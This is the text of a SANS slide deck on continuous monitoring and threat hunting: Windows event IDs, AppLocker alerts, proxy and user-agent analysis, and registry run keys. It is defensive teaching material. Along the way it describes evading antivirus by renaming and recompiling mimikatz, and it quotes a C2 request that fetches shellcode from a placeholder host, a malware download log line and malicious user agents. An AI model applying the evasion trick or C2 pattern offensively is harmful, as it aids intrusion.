The Seamless Way Continuous Monitoring Can Defend Your ... · Mandiant M-Trends 2015 Organizations made some gains, but attackers still had a free rein in breached environments far

Continuous Monitoring and Security Operations © SANS, Seth Misenar & Eric Conrad, All Rights Reserved

1

The Seamless Way Continuous Monitoring Can Defend Your

Organization against Cyber Attacks Eric Conrad (GSE #13) Twitter: @eric_conrad

Seth Misenar (GSE #28) Twitter: @sethmisenar


2

Our Approach to Continuous Monitoring

•  We will focus on both threats and vulnerabilities, and highlight mitigation –  And not monitoring for the sake of checking a box

•  We will provide proven winning strategies –  For example: tracking Microsoft service creation events

•  We will also provide proper focus to both "what" and "how" –  For example, later we will discuss monitoring Windows service

creation events: –  PS C:\> Get-WinEvent -FilterHashtable @{logname='system'; id=7030,7045}


3

Mandiant M-Trends 2015

Organizations made some gains, but attackers still had a free rein in breached environments far too long before being detected—a median of 205 days in 2014 vs. 229 days in 2013. At the same time, the number of organizations discovering these intrusions on their own remained largely unchanged. Sixty-nine percent learned of the breach from an outside entity such as law enforcement. That’s up from 67 percent in 2013 and 63 percent in 2012.1

[1] http://cyber.gd/m-trends-2015


4

Let’s Hunt

• Repeat after me: my network is already owned

• A hunt team is dedicated to finding intrusions that have evaded prevention and detection •  “If you're not hunting,

you're losing” – Richard Bejtlich


5

A Word on Entropy

•  Entropy means disorder –  Strong encryption provides a ciphertext with high entropy –  Random string: high entropy –  Strings like “download” or “files”: lower entropy

•  This is important because many types of malware (and penetration testing tools like Metasploit) use randomly-generated strings for directory names, file names, X.509 certificate information, etc. –  This is done to avoid simple signature matching on the names

•  We can use the malware’s mojo against it by detecting high-entropy: –  File names, directory names, X.509 fields, etc.


6

High Entropy Examples

•  BlackHole exploit kit:

•  Metasploit’s PsExec

exploit:

•  Tbot:


7

Mandiant M-Trends 2015 on Mimikatz

In nearly all of our investigations, the victims’ anti-virus software failed to hinder Mimikatz, despite the tool’s wide reach and reputation. Attackers typically modified and recompiled the source code to evade detection.1



8

The Sed Persistent Threat (SPT)

•  Windows mimikatz binary download –  70% AV detection rate

•  Compiled mimikatz binary from source (no changes) –  31% AV detection rate

•  Compiled mimidogz binary from source –  s/mimikatz/mimidogz/g –  7% AV detection rate


9

This Dog Can Hunt!


10

Whack-a-Mole

•  I re-scanned mimidogz a few hours later on Virustotal, and Kaspersky suddenly detected it

•  I re-scanned the next morning, and 6 more vendors detected it (13 total)


11

Announcing Mimiyakz: The Sed Persistent Threat (SPT) Strikes Again!


12

Application Whitelisting: The Time has Come

•  Blacklisting will always fail vs. a smart attacker •  Application Whitelisting is:

–  Australian Signals Directorate Control #1 –  20 Critical Security Controls "First Five"

•  Make 2015 the year you deploy application whitelisting


13

"Aren't advanced attackers moving towards code and DLL injection…"

•  Yes they are – Especially vs. systems that are hardened with

application whitelisting

•  The cardinal sin of preventive controls: – Set it and forget it

•  Step 1: Deploy application whitelisting (preventive control)

•  Step 2: Monitor blocked applications closely and react in real-time (detection FTW!)


14

Tracking Applocker Alerts

•  For sites that run Applocker, these events should be monitored

•  Audit mode: –  8003: <exe or dll> was allowed to run but would have been

prevented from running if the AppLocker policy were enforced –  8006: <script or msi> was allowed to run but would have

been prevented from running if the AppLocker policy were enforced

•  Block/enforce mode: –  8004: <exe or dll> was not allowed to run –  8007: <script or msi> was not allowed to run1


15

Mandiant M-Trends 2015 on Metasploit

•  The Metasploit module used in this case was psexec_command, which allows attackers to run commands on the compromised system. The module executes commands as a Windows service. It leaves a number of forensic artifacts in the Windows system-event log.1



16

Critical Event 1: Service Creation

•  Critical Security Control 14-9: – Monitor for service creation events and enable

process tracking logs. On Windows systems, many attackers use PsExec functionality to spread from system to system. Creation of a service is an unusual event and should be monitored closely. Process tracking is valuable for incident handling.1

•  We will demonstrate service creation via PsExec [1] http://cyber.gd/511_465


17

System Event ID 7045 Normal Service Creation

•  Services are often created when normal software is installed –  This event was caused by installing

WinPcap –  Service creation events that occur on

critical systems should be verified against change management requests

•  Services created by use of the Sysinternals PsExec command must be verified –  Does your policy allow the use of PsExec?

•  High-entropy service names are highly suspicious! –  Service Name: MmvTBipnvGFMNfUs –  Service File Name: %SYSTEMROOT%\llTTAagm.exe


18

Attacker uses Metasploit PsExec Exploit


19

How Does this Differ from Normal PsExec?

•  PsExec is a Windows Sysinternals tool

•  PsExec functionality has been added to Metasploit –  It is easy to spot the difference between the two versions

in Windows event logs


20

System Event ID 7045 Sysinternals vs. Metasploit PsExec

Service Name: PSEXESVC Service File Name:

%SystemRoot%\PSEXESVC.exe Service Type: user mode service Service Start Type: demand start Service Account: LocalSystem Service Name: MIehTND Service File Name:

%SYSTEMROOT%\iRFMmxan.exe Service Type: user mode service Service Start Type: demand start Service Account: LocalSystem


21

System Event ID 7030 Track Errors

•  Sysinternals PsExec generates no errors, but Metasploit’s generates Event ID 7030 –  The MIehTND service is marked as an interactive service.

However, the system is configured to not allow interactive services. This service may not function properly


22

Mandiant M-Trends 2015 Example C2 via HTTP POST

•  The shellcode makes an HTTP POST request to a hard-coded IP address and downloads XOR-encoded shellcode contained within an HTML comment.

POST /evil.txt HTTP/1.0 Accept: */* Content-Length: 32 Content-Type: application/octet-stream User-Agent: Evil_UA_String Host: 1.2.3.4 Pragma: no-cache <POST_DATA>1 [1] http://cyber.gd/m-trends-2015


23

Proxies Rule!

Proxies keep cropping up over and over, because they are fundamentally a sound idea. Every so often someone re-invents the proxy firewall - as a border spam blocker, or a 'web firewall' or an 'application firewall' or 'database gateway' - etc. And these technologies work wonderfully. Why? Because they're a single point where a security-conscious programmer can assess the threat represented by an application protocol, and can put error detection, attack detection, and validity checking in place – Marcus Ranum


24

Proxy Win: Naked Downloads

•  Perl script that parsed http proxy logs to identify downloads of EXEs from ‘naked IPs;’ First hit: –  172.17.103.3 - - [19/May/2014:15:48:10 -0400] "GET

http://101.93.59.108/lksdfhwey/r.exe HTTP/1.0" 200 731 TCP_MISS:DIRECT

•  “Why is a nursing station downloading software from a former Soviet Union country?” –  EXE scanned clean by 2 separate antivirus programs (proxy and desktop)

•  PC was compromised, inbound prevention and detection had failed


25

On That Same Note…

•  The URL was: –  http://101.93.59.108/lksdfhwey/r.exe

•  Beyond the naked IP, it illustrates other common malware patterns: –  Randomly-generated names, directories, function names,

etc. –  1-character EXE name

•  You can automate searches for these patterns!


26

Let’s Track User Agents

•  HTTP user agents offer high-value data •  User agents are often “fudged” by malware, in

conspicuous ways


27

Common User Agent Substrings

•  Mozilla (Most browsers) –  User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko

•  Opera (The Opera browser) –  User-Agent: Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14

•  Microsoft-CryptoAPI (Windows systems checking CRL servers) –  User-Agent: Microsoft-CryptoAPI/6.0


28

Abnormal HTTP User Agents

•  These are not normal: –  User-Agent: getURLDown –  User-Agent: loadMM –  User-Agent: POSTtj –  User-Agent: Downloader MLR 1.0.0 –  User-Agent: FULLSTUFF –  User-Agent: GaurdMailRu –  User-Agent: GuardMailRu


29

Tracking User Agents

•  Our approach: –  Configure your proxy to log user agents –  Or your NextGen Firewall, or Bro, etc…

•  Sort from least common to most common –  Inspect the least common

•  Sort from longest to shortest –  Inspect the shortest

•  Is this approach perfect? –  Of course some types of malware can evade this check, and/or use actual

legitimate user agent strings –  It is a *very* useful approach


30

Our Approach on the Contagio Crimeware Pcap Collection


31

Mandiant M-Trends 2015 on Persistence

•  Maintaining persistence has long been a hallmark of APT actors, who work to stay in an environment until they’ve completed their mission. But financial actors have increasingly shown their ability to maintain a low profile. In one case, cyber criminals maintained stealthy persistence using well-known Windows startup registry locations to launch their malware. In another, financial threat actors managed to maintain access to an environment for more than five years. We’ve even seen persistence in financial threat actors trying to get back into an environment after being kicked out.1



32

What does a Malicious Startup Registry Key Look Like?

•  Attacker view:

•  Victim view:


33

Windows Registry Startup Keys

•  Query these keys across all Windows systems –  HKLM\Software\Microsoft\Windows\CurrentVersion\Run –  HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce –  HKCU\Software\Microsoft\Windows\CurrentVersion\Run –  HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce

•  Add these (often forgotten) –  HKLM\Software\Wow6432node\Microsoft\Windows\CurrentVersion

\Run –  HKLM\Software\Wow6432node\Microsoft\Windows\CurrentVersion

\RunOnce


34

Accessing Registry Keys Remotely

•  Only HKLM (HKEY Local Machine) and HKCU (HKEY Current User) are available via the remote registry service –  HKCU is accessed via "HKU," and requires ".DEFAULT"

added to the path

•  Example remote registry commands: C:\> reg query \\<system>\HKLM\Software\Microsoft\Windows\CurrentVersion\Run C:\> reg query \\<system>\HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run


35

Example PowerShell Script

•  This script uses PowerShell to wrap remote registry queries


36

Next Step: Long Tail Analysis

1.  Query all startup registry run keys on all systems

2.  Sort in order of duplicates, least to most 3.  Then inspect the least frequently seen

startup registry keys –  Most organizations find malware


37

Then: Automate

•  The first pass may be somewhat time consuming – But worthwhile

•  Once that process is complete: – Re-run the script nightly – Report any new entries

•  What you will find: – New software installs, both authorized and not – New Malware!


38

Sec511: Continuous Monitoring and Security Operations

Key Topics •  Current State Assessment •  Endpoint Security

Architecture •  Network Security

Architecture •  Security Operations

Centers (SOC) •  Continuous Security

Monitoring •  Network Security

Monitoring

What makes this course special? Authored by two GSEs: Seth Misenar (#28) Eric Conrad (#13) 1st Cyber Defense course with a day 6 D3TF (Design/Detect/Defend the Flag) competition powered by •  Twitter: @eric_conrad •  @sethmisenar HTTP://SEC511.COM

Documents

The Seamless Way Continuous Monitoring Can Defend Your ... · Mandiant M-Trends 2015 Organizations made some gains, but attackers still had a free rein in breached environments far